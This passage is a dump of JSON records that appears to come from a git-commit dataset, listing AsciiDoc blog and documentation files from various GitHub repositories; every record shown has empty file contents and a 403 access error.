2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b248196384272b7980620a9bbd5ed3e9176030e","subject":"Update 2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00a661d0951f0032abda47bd06faedad13286d71","subject":"add symlink instead","message":"add symlink instead\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/online\/2015-02-28-02-future-blogs.asciidoc","new_file":"content\/online\/2015-02-28-02-future-blogs.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"807ca956b15b398610722d959f56af9f387e03ce","subject":"Updated feature table","message":"Updated feature table\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"compiler\/README.asciidoc","new_file":"compiler\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05172538e931e4f854b9eb4f24684c21210c7d74","subject":"Deleted _posts\/2017-02-02-Not-Clear.adoc","message":"Deleted _posts\/2017-02-02-Not-Clear.adoc","repos":"tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io","old_file":"_posts\/2017-02-02-Not-Clear.adoc","new_file":"_posts\/2017-02-02-Not-Clear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tofusoul\/tofusoul.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1e13084fbb6279cf559090684d051a8a1de4535","subject":"Update 2019-03-16-Cirq.adoc","message":"Update 2019-03-16-Cirq.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-16-Cirq.adoc","new_file":"_posts\/2019-03-16-Cirq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8e33ef3fc4287d43a80273670bd1627e85c5fcc","subject":"Update 2016-03-23-Episode-51-Its-10-Inches-Man-It-Fits-Through-the-Hole.adoc","message":"Update 2016-03-23-Episode-51-Its-10-Inches-Man-It-Fits-Through-the-Hole.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-03-23-Episode-51-Its-10-Inches-Man-It-Fits-Through-the-Hole.adoc","new_file":"_posts\/2016-03-23-Episode-51-Its-10-Inches-Man-It-Fits-Through-the-Hole.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efa0c02c9c03fe60b10bfd71b93df326071f80d1","subject":"SWARM-1235: Better document logging category name delineation. (#479)","message":"SWARM-1235: Better document logging category name delineation. (#479)\n\nMotivation\r\n----------\r\nDocs were unclear on using [ ] around logging category names.\r\n\r\nModifications\r\n-------------\r\nAdded some docs.\r\n\r\nResult\r\n------\r\nStuff is documented.","repos":"heiko-braun\/wildfly-swarm-1,gastaldi\/wildfly-swarm,kenfinnigan\/wildfly-swarm,gastaldi\/wildfly-swarm,juangon\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,heiko-braun\/wildfly-swarm-1,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,jamezp\/wildfly-swarm,kenfinnigan\/wildfly-swarm,heiko-braun\/wildfly-swarm-1,heiko-braun\/wildfly-swarm-1,jamezp\/wildfly-swarm,gastaldi\/wildfly-swarm,gastaldi\/wildfly-swarm,juangon\/wildfly-swarm,jamezp\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,heiko-braun\/wildfly-swarm-1,jamezp\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,gastaldi\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,jamezp\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm","old_file":"fractions\/wildfly\/logging\/README.adoc","new_file":"fractions\/wildfly\/logging\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72c7f40ab74f0fae3d76a6dccba29498f76742a2","subject":"Update 2015-02-24-Joomla-Pizza-Bugs-and-Fun-Frankfurt.adoc","message":"Update 2015-02-24-Joomla-Pizza-Bugs-and-Fun-Frankfurt.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-24-Joomla-Pizza-Bugs-and-Fun-Frankfurt.adoc","new_file":"_posts\/2015-02-24-Joomla-Pizza-Bugs-and-Fun-Frankfurt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c3bce0f0bf1c062aa3f377f06b1d2a22c88b0bd","subject":"Update 2017-XX-XX-Using-J-Rby-on-Windows.adoc","message":"Update 2017-XX-XX-Using-J-Rby-on-Windows.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2017-XX-XX-Using-J-Rby-on-Windows.adoc","new_file":"_posts\/2017-XX-XX-Using-J-Rby-on-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbc76253b933b5616f2d183883d61a41be3188af","subject":"Update 2015-07-22-Piyo.adoc","message":"Update 2015-07-22-Piyo.adoc","repos":"fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io","old_file":"_posts\/2015-07-22-Piyo.adoc","new_file":"_posts\/2015-07-22-Piyo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fr-developer\/fr-developer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89a6d99c0e2feac9e290d7ce35b9b9300f573062","subject":"Update 2016-03-17-Goss.adoc","message":"Update 2016-03-17-Goss.adoc","repos":"indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io","old_file":"_posts\/2016-03-17-Goss.adoc","new_file":"_posts\/2016-03-17-Goss.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/indusbox\/indusbox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa62e10a24b6a86b22f65eeab1be613cbee446d2","subject":"Update 2016-07-29-TEST.adoc","message":"Update 2016-07-29-TEST.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-TEST.adoc","new_file":"_posts\/2016-07-29-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd5a5d59e4ba50bbc94e36d7c202958946538f67","subject":"Update 2015-09-19-JSON-in-Python.adoc","message":"Update 2015-09-19-JSON-in-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31eeb162a96ce373915a7a74c07b899904a36c50","subject":"Initial draft of automatic provisioning documentation","message":"Initial draft of automatic provisioning documentation\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp","old_file":"docs\/automatic-provisioning.adoc","new_file":"docs\/automatic-provisioning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"9e535803092e5c77a6f09204aa10a59fa6b391df","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d945e1aa18f8bf8962f32c797cb8cb875e1698f","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21c598acfcf262185d3b1f1ac3a79f836fa61d49","subject":"Update 2018-04-03-Blockchain-Design-considerations.adoc","message":"Update 2018-04-03-Blockchain-Design-considerations.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-03-Blockchain-Design-considerations.adoc","new_file":"_posts\/2018-04-03-Blockchain-Design-considerations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d705fde3d58542b3116d75bedcfa13976d9603a","subject":"Update 2016-07-23-Pourquoi-Rennes-le-Chateau-Berenger-Sauniere.adoc","message":"Update 2016-07-23-Pourquoi-Rennes-le-Chateau-Berenger-Sauniere.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-23-Pourquoi-Rennes-le-Chateau-Berenger-Sauniere.adoc","new_file":"_posts\/2016-07-23-Pourquoi-Rennes-le-Chateau-Berenger-Sauniere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c7fad9b9640061a45eb03eac6eadff94f19262","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aab7d2147babd311bee1c9e33724636e26f95ab5","subject":"Update 2017-06-30-First-work-of-my-data-sience.adoc","message":"Update 2017-06-30-First-work-of-my-data-sience.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37eb29472a77db079a58f12f136277c08793dbff","subject":"CAMEL-9679: Support for Hessian serialization - add docs","message":"CAMEL-9679: Support for Hessian serialization - add docs\n","repos":"RohanHart\/camel,dmvolod\/camel,mgyongyosi\/camel,apache\/camel,isavin\/camel,mgyongyosi\/camel,Fabryprog\/camel,nicolaferraro\/camel,scranton\/camel,jkorab\/camel,Thopap\/camel,drsquidop\/camel,sabre1041\/camel,gnodet\/camel,cunningt\/camel,NickCis\/camel,JYBESSON\/camel,tlehoux\/camel,allancth\/camel,pmoerenhout\/camel,christophd\/camel,nboukhed\/camel,jlpedrosa\/camel,jmandawg\/camel,snurmine\/camel,objectiser\/camel,pkletsko\/camel,isavin\/camel,trohovsky\/camel,lburgazzoli\/camel,pax95\/camel,JYBESSON\/camel,borcsokj\/camel,nicolaferraro\/camel,kevinearls\/camel,jmandawg\/camel,edigrid\/camel,jonmcewen\/camel,chirino\/camel,jlpedrosa\/camel,prashant2402\/camel,sirlatrom\/camel,onders86\/camel,bgaudaen\/camel,sabre1041\/camel,anoordover\/camel,trohovsky\/camel,yuruki\/camel,JYBESSON\/camel,DariusX\/camel,jamesnetherton\/camel,adessaigne\/camel,pmoerenhout\/camel,nikvaessen\/camel,jarst\/camel,sverkera\/camel,sverkera\/camel,ssharma\/camel,sirlatrom\/camel,pax95\/camel,sverkera\/camel,jarst\/camel,gnodet\/camel,dmvolod\/camel,w4tson\/camel,arnaud-deprez\/camel,edigrid\/camel,Thopap\/camel,pmoerenhout\/camel,FingolfinTEK\/camel,snurmine\/camel,scranton\/camel,pax95\/camel,tlehoux\/camel,RohanHart\/camel,kevinearls\/camel,Thopap\/camel,RohanHart\/camel,Thopap\/camel,tadayosi\/camel,erwelch\/camel,jarst\/camel,atoulme\/camel,YoshikiHigo\/camel,jarst\/camel,jamesnetherton\/camel,gautric\/camel,iweiss\/camel,jamesnetherton\/camel,tdiesler\/camel,onders86\/camel,nikvaessen\/camel,allancth\/camel,cunningt\/camel,Fabryprog\/camel,anoordover\/camel,tlehoux\/camel,apache\/camel,tkopczynski\/camel,nboukhed\/camel,bhaveshdt\/camel,oalles\/camel,iweiss\/camel,hqstevenson\/camel,isavin\/camel,sirlatrom\/camel,allancth\/camel,dmvolod\/camel,erwelch\/camel,nikhilvibhav\/camel,yuruki\/camel,apache\/camel,johnpoth\/camel,cunningt\/camel,nboukhed\/camel,oalles\/camel,zregvart\/camel,jlpedrosa\/camel,driseley\/camel,hqstevenson\/camel,veithen\/camel,JYBESSON\/camel,akhettar\/camel,trohovsky\/camel,pmoerenhout\/camel,tdiesler\/camel,hqstevenson\/camel,mcollovati\/camel,anton-k11\/camel,sabre1041\/camel,driseley\/camel,lburgazzoli\/apache-camel,tkopczynski\/camel,tadayosi\/camel,scranton\/camel,acartapanis\/camel,lburgazzoli\/camel,ullgren\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,acartapanis\/camel,kevinearls\/camel,mgyongyosi\/camel,tlehoux\/camel,mgyongyosi\/camel,chirino\/camel,jkorab\/camel,Thopap\/camel,CodeSmell\/camel,isavin\/camel,borcsokj\/camel,objectiser\/camel,nikhilvibhav\/camel,jkorab\/camel,jmandawg\/camel,erwelch\/camel,driseley\/camel,snurmine\/camel,christophd\/camel,rmarting\/camel,nikvaessen\/camel,acartapanis\/camel,erwelch\/camel,jonmcewen\/camel,johnpoth\/camel,anton-k11\/camel,punkhorn\/camel-upstream,cunningt\/camel,anoordover\/camel,YoshikiHigo\/camel,lburgazzoli\/camel,lburgazzoli\/camel,mgyongyosi\/camel,lburgazzoli\/camel,JYBESSON\/camel,kevinearls\/camel,curso007\/camel,hqstevenson\/camel,tkopczynski\/camel,tdiesler\/camel,prashant2402\/camel,anoordover\/camel,ssharma\/camel,dmvolod\/camel,akhettar\/camel,johnpoth\/camel,apache\/camel,hqstevenson\/camel,nicolaferraro\/camel,gautric\/camel,driseley\/camel,sverkera\/camel,chirino\/camel,bgaudaen\/camel,davidkarlsen\/camel,akhettar\/camel,edigrid\/camel,FingolfinTEK\/camel,jmandawg\/camel,johnpoth\/camel,alvinkwekel\/camel,christophd\/camel,onders86\/camel,scranton\/camel,mcollovati\/camel,rmarting\/camel,nboukhed\/camel,YoshikiHigo\/camel,sabre1041\/camel,pax95\/camel,FingolfinTEK\/camel,DariusX\/camel,atoulme\/camel,gilfernandes\/camel,edigrid\/camel,pax95\/camel,rmarting\/camel,gautric\/camel,FingolfinTEK\/camel,yuruki\/camel,atoulme\/camel,curso007\/camel,gilfernandes\/camel,nikhilvibhav\/camel,tdiesler\/camel,jamesnetherton\/camel,adessaigne\/camel,curso007\/camel,prashant2402\/camel,DariusX\/camel,veithen\/camel,christophd\/camel,pkletsko\/camel,alvinkwekel\/camel,YoshikiHigo\/camel,ssharma\/camel,mgyongyosi\/camel,jamesnetherton\/camel,christophd\/camel,rmarting\/camel,rmarting\/camel,w4tson\/camel,bgaudaen\/camel,bhaveshdt\/camel,davidkarlsen\/camel,drsquidop\/camel,trohovsky\/camel,dmvolod\/camel,davidkarlsen\/camel,oalles\/camel,tkopczynski\/camel,tadayosi\/camel,pmoerenhout\/camel,christophd\/camel,atoulme\/camel,neoramon\/camel,tkopczynski\/camel,jlpedrosa\/camel,jkorab\/camel,zregvart\/camel,davidkarlsen\/camel,arnaud-deprez\/camel,neoramon\/camel,gautric\/camel,nikhilvibhav\/camel,zregvart\/camel,edigrid\/camel,prashant2402\/camel,bhaveshdt\/camel,RohanHart\/camel,neoramon\/camel,veithen\/camel,tlehoux\/camel,kevinearls\/camel,cunningt\/camel,arnaud-deprez\/camel,anoordover\/camel,jonmcewen\/camel,lburgazzoli\/camel,gilfernandes\/camel,DariusX\/camel,acartapanis\/camel,gilfernandes\/camel,tadayosi\/camel,pmoerenhout\/camel,atoulme\/camel,hqstevenson\/camel,ullgren\/camel,gnodet\/camel,chirino\/camel,allancth\/camel,neoramon\/camel,jlpedrosa\/camel,borcsokj\/camel,curso007\/camel,jmandawg\/camel,iweiss\/camel,sabre1041\/camel,pkletsko\/camel,mcollovati\/camel,johnpoth\/camel,nboukhed\/camel,anton-k11\/camel,akhettar\/camel,tdiesler\/camel,snurmine\/camel,apache\/camel,rmarting\/camel,drsquidop\/camel,adessaigne\/camel,edigrid\/camel,borcsokj\/camel,tadayosi\/camel,nikvaessen\/camel,bgaudaen\/camel,jmandawg\/camel,adessaigne\/camel,drsquidop\/camel,iweiss\/camel,gnodet\/camel,kevinearls\/camel,gautric\/camel,gilfernandes\/camel,NickCis\/camel,akhettar\/camel,drsquidop\/camel,prashant2402\/camel,johnpoth\/camel,allancth\/camel,ssharma\/camel,ullgren\/camel,sirlatrom\/camel,Fabryprog\/camel,acartapanis\/camel,yuruki\/camel,pkletsko\/camel,NickCis\/camel,FingolfinTEK\/camel,adessaigne\/camel,bgaudaen\/camel,trohovsky\/camel,CodeSmell\/camel,punkhorn\/camel-upstream,anton-k11\/camel,jonmcewen\/camel,salikjan\/camel,onders86\/camel,veithen\/camel,CodeSmell\/camel,objectiser\/camel,alvinkwekel\/camel,isavin\/camel,bgaudaen\/camel,jarst\/camel,onders86\/camel,akhettar\/camel,lburgazzoli\/apache-camel,snurmine\/camel,salikjan\/camel,chirino\/camel,drsquidop\/camel,erwelch\/camel,iweiss\/camel,snurmine\/camel,neoramon\/camel,veithen\/camel,borcsokj\/camel,NickCis\/camel,cunningt\/camel,ssharma\/camel,onders86\/camel,anton-k11\/camel,alvinkwekel\/camel,dmvolod\/camel,objectiser\/camel,sirlatrom\/camel,chirino\/camel,jamesnetherton\/camel,sverkera\/camel,jonmcewen\/camel,sverkera\/camel,FingolfinTEK\/camel,pax95\/camel,neoramon\/camel,arnaud-deprez\/camel,punkhorn\/camel-upstream,pkletsko\/camel,veithen\/camel,tadayosi\/camel,ssharma\/camel,pkletsko\/camel,jkorab\/camel,jlpedrosa\/camel,RohanHart\/camel,oalles\/camel,sirlatrom\/camel,yuruki\/camel,lburgazzoli\/apache-camel,jarst\/camel,jkorab\/camel,arnaud-deprez\/camel,oalles\/camel,arnaud-deprez\/camel,driseley\/camel,zregvart\/camel,scranton\/camel,isavin\/camel,bhaveshdt\/camel,anoordover\/camel,adessaigne\/camel,YoshikiHigo\/camel,w4tson\/camel,acartapanis\/camel,iweiss\/camel,RohanHart\/camel,gilfernandes\/camel,nboukhed\/camel,allancth\/camel,w4tson\/camel,jonmcewen\/camel,Thopap\/camel,JYBESSON\/camel,gnodet\/camel,borcsokj\/camel,apache\/camel,yuruki\/camel,bhaveshdt\/camel,ullgren\/camel,bhaveshdt\/camel,erwelch\/camel,lburgazzoli\/apache-camel,NickCis\/camel,mcollovati\/camel,w4tson\/camel,lburgazzoli\/apache-camel,scranton\/camel,curso007\/camel,nicolaferraro\/camel,lburgazzoli\/apache-camel,gautric\/camel,atoulme\/camel,NickCis\/camel,driseley\/camel,trohovsky\/camel,anton-k11\/camel,w4tson\/camel,tkopczynski\/camel,tdiesler\/camel,prashant2402\/camel,oalles\/camel,curso007\/camel,sabre1041\/camel,Fabryprog\/camel,YoshikiHigo\/camel,nikvaessen\/camel,tlehoux\/camel,nikvaessen\/camel","old_file":"components\/camel-snakeyaml\/src\/main\/docs\/hessian.adoc","new_file":"components\/camel-snakeyaml\/src\/main\/docs\/hessian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bhaveshdt\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c5619d1a0f3d89b4e4206bcf7dc313aeaf02dea","subject":"Minor doc edit","message":"Minor doc edit\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/Extension Authors Guide.adoc","new_file":"docs\/src\/main\/asciidoc\/Extension Authors Guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0535f660ad944927efcc6a18592749f7787bcb2a","subject":"updating to latest Docker CE","message":"updating to latest Docker CE\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch04-run-container.adoc","new_file":"developer-tools\/java\/chapters\/ch04-run-container.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"afc750111e5c53c56139ce710d1947989aa8daef","subject":"y2b create post Add Buttons to your Phone?","message":"y2b create post Add Buttons to your Phone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-17-Add-Buttons-to-your-Phone.adoc","new_file":"_posts\/2015-05-17-Add-Buttons-to-your-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"450353daa4269f692c47cbaafb2c0a860d2e6c9d","subject":"Update 2019-02-16-Ten-Stars-of-Country-Music.adoc","message":"Update 2019-02-16-Ten-Stars-of-Country-Music.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2019-02-16-Ten-Stars-of-Country-Music.adoc","new_file":"_posts\/2019-02-16-Ten-Stars-of-Country-Music.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b84f82d7d432ac6b1749848d1be250867a52d87","subject":"y2b create post This Lasagna Lasts 20 YEARS!","message":"y2b create post This Lasagna Lasts 20 YEARS!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-10-This-Lasagna-Lasts-20-YEARS.adoc","new_file":"_posts\/2016-07-10-This-Lasagna-Lasts-20-YEARS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df71f312fa22f31ae2ce159392807ef2b234995c","subject":"Added removeProperty EIP docs","message":"Added removeProperty EIP docs\n","repos":"snurmine\/camel,pax95\/camel,ullgren\/camel,anoordover\/camel,tadayosi\/camel,pmoerenhout\/camel,anoordover\/camel,pax95\/camel,pmoerenhout\/camel,CodeSmell\/camel,mcollovati\/camel,Fabryprog\/camel,jonmcewen\/camel,tdiesler\/camel,jonmcewen\/camel,DariusX\/camel,cunningt\/camel,nicolaferraro\/camel,onders86\/camel,cunningt\/camel,alvinkwekel\/camel,dmvolod\/camel,jamesnetherton\/camel,curso007\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,jamesnetherton\/camel,gautric\/camel,DariusX\/camel,apache\/camel,jamesnetherton\/camel,anoordover\/camel,akhettar\/camel,ullgren\/camel,zregvart\/camel,gnodet\/camel,onders86\/camel,snurmine\/camel,davidkarlsen\/camel,curso007\/camel,apache\/camel,pmoerenhout\/camel,gnodet\/camel,DariusX\/camel,onders86\/camel,tadayosi\/camel,akhettar\/camel,gautric\/camel,jonmcewen\/camel,akhettar\/camel,christophd\/camel,tdiesler\/camel,onders86\/camel,CodeSmell\/camel,dmvolod\/camel,snurmine\/camel,alvinkwekel\/camel,sverkera\/camel,jonmcewen\/camel,kevinearls\/camel,sverkera\/camel,sverkera\/camel,nikhilvibhav\/camel,sverkera\/camel,jamesnetherton\/camel,pax95\/camel,objectiser\/camel,cunningt\/camel,objectiser\/camel,CodeSmell\/camel,Fabryprog\/camel,pmoerenhout\/camel,